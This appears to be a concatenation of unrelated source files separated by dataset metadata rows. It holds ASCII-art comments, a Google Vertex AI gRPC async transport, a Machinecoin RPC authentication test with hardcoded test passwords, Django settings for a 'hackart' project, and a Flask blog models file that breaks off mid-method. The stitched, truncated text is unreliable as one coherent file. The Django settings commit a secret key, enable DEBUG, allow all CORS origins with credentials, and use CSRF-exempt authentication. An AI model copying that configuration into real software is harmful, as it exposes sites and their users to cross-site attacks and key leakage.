#==============+++itiiitttIXRRXXXVYYYYYYXVVYVVYIIti=;=iYVtVVVYYYYVRRIIItttitttttttttttttttttttttttttttttttttttt++==+==
#=============+iitttiiitttIYRRRXXVVYYYYYVVXXXVt+=;=;+tttYtYVVYYYVVRRIIIttttttttttttttttttttttttttttttttttttttttti+=+==
#==========++iittttttiittIIYXRRRXXVYYYYYYVXXYVIttitttiitItYYVYYVVXRRIIIttttttttttttttttttttttttttttttttttttttIItti+===
#=========+iitttttttttttttIYVXRRRXVYYYYYYYXVttYiiiiiiiiIIIIYVVVVVRRRIIItttttttttttttttttttttttttttttttttttttttIIIti===
#======+++iiitttttttttttttIYYVRBRRXVVVYYIYVVItYti++iiitItIIYVVVVXRRRYIItttttttttttttttttttttttttttttttttttttttIIIIti==
#++===++iiitttttttttttttttIYYVXRRRRXVYYYYYVYIttItiititIItIYVVVVXXRRRIIItttttttttttttttttttttttttttttttttttttttIIIIIt+=
#===++iittttttttttttttttttIIYYVRBRRXXVVYYYVVYIitYIIIIYVYIIYVVVXXRXRRIIIttttttttttttttttttttttttttttttttttttttttIIIIIt=
#=++iittttttttttttttttttttIIYYYXBRRRXXVVYYVVVIttYYIIIYYIIIYVVVXRRXRRIItttItttttttttttttttttttttttttttttttttttttIIIIII=
#+iiitttttttttttttttttttttIIIYYYRRRRRXVVVYVVVYIttIIIYIttIYYVVXXRRXBXIIttIItttttttttttttttttttttttttttttttttttttIIIIII+
#ittitttttttttttttttttttttIIIYYYVRRRRRXXXVVVVVVItttiiitIYYVYVXXRRXBXIIttIttttttttttttttttttttttttttttttttIttttttIIIIIi
#ttttttttttttttttttttttttttIIIIYYXRXBBXXXXVYVXXVIItttIIYVVVYXRRRRXMXIItttttttttttttttttttttttttttttttttttIttttttIIIIIt
#ttttitttttttttttItttttttttIIYIIIYXXXRBRXXXVVVXXVVYYVXXVVYIVRRRXXRMVItttttttttttttttttttttttttttttttttttIIItttIttIIIIt
#tttttttttttttttttttttttIItIIIYIIIVRVXRRRXRXXVYVXXXXXVVYYIYXRRXVVBWVttttttttttttttttttttttttttttttttttttIIIttttttIIIIt
#ttttttttttttttItttIIttttIttIIIIIIIVXVYRRRRRRVYIYYYYIIIIIIVRBXVVYBWYtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#ttttttttttttttIIIItIItttIttIIIIIIIYVRXYXBRXRRXYIIIttIttIVRBXVYYYBWVtttttttttttttttttttttttttttttttttttIIIIItttIIIIIIt
#tIttttttttttIIIIIIIIItttItttIIIIIIYYXXXYVRRRRRXYIYIIIYYVRRXYYYIIMWXttttttttttttttttttttttttttttttttttttIIIItttIIIIIII
#ttttttttttttIIIIIIIIItttIIttIIIIIIYIXXXXVVXRRRBXVYYYYYXRRVYIIIIIBRYttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttttIIIIIIIIIIIItttIItttIIIIIIIYRVXXXVVXRRBBRRRRRRVItIIttIIVItttttttttttttttttttttttttttttttttttttIIIIItIIIIIIIt
#tttttttIIIIIIIIIIIIIItttIIIttIIIIIIIIVBVVVVVVYVXXXXVVYIttttttIItttttttttttttttttIttttttttttttttttttttttIIIIItIIIIIIIt
#tttIttttttIIIIIIIIIttttIIIItttIIIIIIIIRMYIYYYYYIIttttitttttttItttttttttttttttIIItttttttttttttttttttttttIItIIIIIIIIIIt
#tttIIIIIIIIIIIIIIIIIttttIIIIttIIIIYIIIYBMYttIIIItttttttttttttttttttttttttttttttttttttttttttttttttttttttIItIIIIIIIIIIt
#IIIIIIIIIIIIIIIIIIIIIttttIIItttIIIIIIIIVMMYittttttttitttttttIttttItttIIItttttttttttttttttttttttttttttttIIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIIItttIIIItttIIIIIIYtXWMYitiiiiiiiitttttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIIIIIIIIIItIIttIIIIttIIIIIIIIIRWRIttiiiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIttttttttttttIIttIIIttIIIIIIIIIIVYIItttiiiiiittttIItttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIII
#IIIIIIIIIIIIttIIItIIIIIIIIIIIIIttIIIIIIIIIIttIIIItitiittttIIttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIIYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttttIItIIIttttttItttttttttttttttttttttttttttttttttttttttttttttIIIIIIIIIIYYI
#IIIIIIIIIIIIIttIItIIIIIIIttIIIItttIIIIIIttttIItIIIItIttttIItttttttIIttttttttttttttttttttttttttttttttttttIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItItttttIIIIttttIIIItttIYIttIIIIIIIItIttttttIItttttttttttttttttttttttttttttttttttttIIIIIIIYYIIYYI
#IIIIIIIIIIIIIttIIIIIItttttttIIIItttttIIItIIIIYIttIttttIIIItttttIIttttttttttttttttttttttttttttttttttttttIIIIIIYYYIIYYI
| gpl-2.0 | -1,536,256,754,729,362,000 | 70.308108 | 352 | 0.673817 | false |
googleapis/googleapis-gen | google/cloud/aiplatform/v1/aiplatform-v1-py/google/cloud/aiplatform_v1/services/migration_service/transports/grpc_asyncio.py | 1 | 14287 | # -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.aiplatform_v1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
from .base import MigrationServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import MigrationServiceGrpcTransport
class MigrationServiceGrpcAsyncIOTransport(MigrationServiceTransport):
"""gRPC AsyncIO backend transport for MigrationService.
A service that migrates resources from automl.googleapis.com,
datalabeling.googleapis.com and ml.googleapis.com to Vertex AI.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
            scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
                ``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def search_migratable_resources(self) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Awaitable[migration_service.SearchMigratableResourcesResponse]]:
r"""Return a callable for the search migratable resources method over gRPC.
Searches all of the resources in
automl.googleapis.com, datalabeling.googleapis.com and
ml.googleapis.com that can be migrated to Vertex AI's
given location.
Returns:
Callable[[~.SearchMigratableResourcesRequest],
Awaitable[~.SearchMigratableResourcesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'search_migratable_resources' not in self._stubs:
self._stubs['search_migratable_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/SearchMigratableResources',
request_serializer=migration_service.SearchMigratableResourcesRequest.serialize,
response_deserializer=migration_service.SearchMigratableResourcesResponse.deserialize,
)
return self._stubs['search_migratable_resources']
@property
def batch_migrate_resources(self) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the batch migrate resources method over gRPC.
Batch migrates resources from ml.googleapis.com,
automl.googleapis.com, and datalabeling.googleapis.com
to Vertex AI.
Returns:
Callable[[~.BatchMigrateResourcesRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'batch_migrate_resources' not in self._stubs:
self._stubs['batch_migrate_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/BatchMigrateResources',
request_serializer=migration_service.BatchMigrateResourcesRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['batch_migrate_resources']
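# --- Illustrative usage sketch (added for documentation; not part of the generated
# transport). It shows how the stub callables exposed above are typically awaited;
# the project/location values below are placeholders, and the transport is assumed
# to be an already constructed MigrationServiceGrpcAsyncIOTransport instance.
async def _example_search_migratable_resources(transport):
    """Invoke the SearchMigratableResources stub of an existing transport."""
    request = migration_service.SearchMigratableResourcesRequest(
        parent="projects/my-project/locations/us-central1",
    )
    # The property returns the gRPC callable; calling and awaiting it yields a
    # SearchMigratableResourcesResponse.
    return await transport.search_migratable_resources(request)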
__all__ = (
'MigrationServiceGrpcAsyncIOTransport',
)
| apache-2.0 | -6,148,530,257,652,525,000 | 45.537459 | 102 | 0.623084 | false |
machinecoin-project/machinecoin | test/functional/rpc_users.py | 2 | 7912 | #!/usr/bin/env python3
# Copyright (c) 2015-2018 The Machinecoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiple RPC users."""
from test_framework.test_framework import MachinecoinTestFramework
from test_framework.util import (
assert_equal,
get_datadir_path,
str_to_b64str,
)
import os
import http.client
import urllib.parse
import subprocess
from random import SystemRandom
import string
import configparser
import sys
class HTTPBasicsTest(MachinecoinTestFramework):
def set_test_params(self):
self.num_nodes = 2
def setup_chain(self):
super().setup_chain()
#Append rpcauth to machinecoin.conf before initialization
rpcauth = "rpcauth=rt:93648e835a54c573682c2eb19f882535$7681e9c5b74bdd85e78166031d2058e1069b3ed7ed967c93fc63abba06f31144"
rpcauth2 = "rpcauth=rt2:f8607b1a88861fac29dfccf9b52ff9f$ff36a0c23c8c62b4846112e50fa888416e94c17bfd4c42f88fd8f55ec6a3137e"
rpcuser = "rpcuser=rpcuser💻"
rpcpassword = "rpcpassword=rpcpassword🔑"
self.user = ''.join(SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(10))
config = configparser.ConfigParser()
config.read_file(open(self.options.configfile))
gen_rpcauth = config['environment']['RPCAUTH']
p = subprocess.Popen([sys.executable, gen_rpcauth, self.user], stdout=subprocess.PIPE, universal_newlines=True)
lines = p.stdout.read().splitlines()
rpcauth3 = lines[1]
self.password = lines[3]
with open(os.path.join(get_datadir_path(self.options.tmpdir, 0), "machinecoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcauth+"\n")
f.write(rpcauth2+"\n")
f.write(rpcauth3+"\n")
with open(os.path.join(get_datadir_path(self.options.tmpdir, 1), "machinecoin.conf"), 'a', encoding='utf8') as f:
f.write(rpcuser+"\n")
f.write(rpcpassword+"\n")
def run_test(self):
##################################################
# Check correctness of the rpcauth config option #
##################################################
url = urllib.parse.urlparse(self.nodes[0].url)
#Old authpair
authpair = url.username + ':' + url.password
#New authpair generated via share/rpcauth tool
password = "cA773lm788buwYe4g4WT+05pKyNruVKjQ25x3n0DQcM="
#Second authpair with different username
password2 = "8/F3uMDw4KSEbw96U3CA1C4X05dkHDN2BPFjTgZW4KI="
authpairnew = "rt:"+password
self.log.info('Correct...')
headers = {"Authorization": "Basic " + str_to_b64str(authpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Use new authpair to confirm both work
self.log.info('Correct...')
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rt's password
self.log.info('Wrong...')
authpairnew = "rtwrong:"+password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rt
self.log.info('Wrong...')
authpairnew = "rt:"+password+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Correct for rt2
self.log.info('Correct...')
authpairnew = "rt2:"+password2
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong password for rt2
self.log.info('Wrong...')
authpairnew = "rt2:"+password2+"wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Correct for randomly generated user
self.log.info('Correct...')
authpairnew = self.user+":"+self.password
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong password for randomly generated user
self.log.info('Wrong...')
authpairnew = self.user+":"+self.password+"Wrong"
headers = {"Authorization": "Basic " + str_to_b64str(authpairnew)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
###############################################################
# Check correctness of the rpcuser/rpcpassword config options #
###############################################################
url = urllib.parse.urlparse(self.nodes[1].url)
# rpcuser and rpcpassword authpair
self.log.info('Correct...')
rpcuserauthpair = "rpcuser💻:rpcpassword🔑"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 200)
conn.close()
#Wrong login name with rpcuser's password
rpcuserauthpair = "rpcuserwrong:rpcpassword"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
#Wrong password for rpcuser
self.log.info('Wrong...')
rpcuserauthpair = "rpcuser:rpcpasswordwrong"
headers = {"Authorization": "Basic " + str_to_b64str(rpcuserauthpair)}
conn = http.client.HTTPConnection(url.hostname, url.port)
conn.connect()
conn.request('POST', '/', '{"method": "getbestblockhash"}', headers)
resp = conn.getresponse()
assert_equal(resp.status, 401)
conn.close()
if __name__ == '__main__':
HTTPBasicsTest ().main ()
| mit | 8,029,643,323,245,686,000 | 37.339806 | 129 | 0.607369 | false |
mhefley/hackart | hackart/settings.py | 1 | 4632 | """
Django settings for hackart project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7$x4x@#=w^_@d*yep49wfla2)lvu^!g)&+ea76n2xjkqyno(n#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['gitlab.nullify.online']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#App specific
'rest_framework',
'api',
'corsheaders'
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
#'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
'rest_framework.permissions.IsAuthenticated'
],
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': [
'api.rest_framework_config.CsrfExemptSessionAuthentication',
'rest_framework.authentication.SessionAuthentication'
],
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
ROOT_URLCONF = 'hackart.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hackart.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| mit | -2,741,053,265,845,104,000 | 27.316456 | 91 | 0.668826 | false |
Blackyukun/Simpleblog | app/models.py | 1 | 15497 | import datetime
from flask_login import UserMixin, AnonymousUserMixin
from flask import current_app, request, url_for
from hashlib import md5
from werkzeug.security import generate_password_hash, check_password_hash
from markdown import markdown
import bleach
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from app.exceptions import ValidationError
from app import db, lm, whooshee
"""
generate_password_hash(password, method='pbkdf2:sha1', salt_length=8): takes the original
password as input and returns the password hash as a string; the returned value can be stored
in the user database. The defaults for method and salt_length cover most needs.
check_password_hash(hash, password): takes the password hash retrieved from the database and
the password entered by the user; a return value of True means the password is correct.
flask_login's UserMixin class implements the user methods:
is_authenticated: must return True if the user is logged in, otherwise False
is_active: must return True if the user is allowed to log in, otherwise False; returning False
can be used to disable an account
is_anonymous: must return False for regular users
get_id(): must return the user's unique identifier as a Unicode string
The follower/followed many-to-many data model is implemented with the followed and followers
relationships, each defined as a separate one-to-many relationship.
The optional foreign_keys argument must be used to specify the foreign keys and remove the
ambiguity between them.
The db.backref() argument does not describe the reference between these two relationships; it
back-references the Follow model, and the back reference uses lazy='joined'.
The cascade argument is a comma-separated list of cascade options; all means every cascade
option except delete-orphan, i.e. enable all default cascade options and additionally delete
orphaned records.
is_following() and is_followed_by() search the left- and right-hand one-to-many relationships
for the given user and return True when the user is found.
Getting the posts of followed users:
db.session.query(Post) states that the query returns Post objects
select_from(Follow) means the query starts from the Follow model
filter_by(follower_id=self.id) filters the follows table by the following user
join(Post, Follow.followed_id==Post.author_id) joins the filter_by() result with the Post objects
The permissions field of the Role model is an integer used as bit flags. Each operation has its
own bit position, and a role that may perform an operation has that bit set to 1.
Application permissions:
follow users: 0x01
post comments: 0x02
publish articles or questions: 0x04
moderate other users' comments: 0x08
administrator: 0x80
User roles:
guest: 0x00 a user who is not logged in; read-only access
user: 0x07 may publish articles, ask questions, comment and follow users; the default role
moderator: 0x0f may additionally review and suppress inappropriate comments
administrator: 0xff has every permission, including changing other users' role permissions
After the database has been created the user roles must be created; upgrade the database first,
then:
run python manage.py shell
>>> Role.insert_roles()
>>> Role.query.all()
The Comment model has the same attributes as the Post model plus a disabled field, a boolean the
author can use to block inappropriate comments.
The Post model also gets a disabled field.
In the conversation model, lazy='joined' loads the records eagerly using a join, and primaryjoin
explicitly specifies the join condition between the two models.
To remove the ambiguity between the foreign keys, the optional foreign_keys argument must be
given when the relationships are defined.
The cascade argument is a comma-separated list of cascade options; all means every cascade
option except delete-orphan, and all, delete-orphan enables all default cascade options and
additionally deletes orphaned records.
Token-based authentication methods added to the User model:
generate_auth_token() generates a signed token from the encoded user id field, with an
expiration time given in seconds.
verify_auth_token() takes a token and returns the corresponding user when the token is valid.
An illustrative usage sketch for the roles and permission bit flags is appended at the end of
this module.
"""
# follower/followed association table
class Follow(db.Model):
__tablename__ = 'follows'
follower_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
followed_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow)
# messages = db.relationship('Message', backref='follow', uselist=False)
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
    # relationships
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
posts = db.relationship('Post', backref='author', lazy='dynamic')
# post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
likes = db.relationship('Like', backref='user', lazy='dynamic')
comments = db.relationship('Comment', backref='author', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='author', lazy='dynamic')
    # profile information
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime)
    # following and followers
followed = db.relationship('Follow',
foreign_keys = [Follow.follower_id],
backref = db.backref('follower', lazy='joined'),
lazy = 'dynamic',
cascade = 'all, delete-orphan')
followers = db.relationship('Follow',
foreign_keys=[Follow.followed_id],
backref=db.backref('followed', lazy='joined'),
lazy='dynamic',
cascade='all, delete-orphan')
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role is None:
if self.email == current_app.config['ADMINMAIL']:
self.role = Role.query.filter_by(permissions=0xff).first()
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
    # check whether the user has the given permissions
def operation(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.operation(Permission.ADMINISTER)
    # follow a user
def follow(self, user):
if not self.is_following(user):
follower = Follow(follower=self, followed=user)
db.session.add(follower)
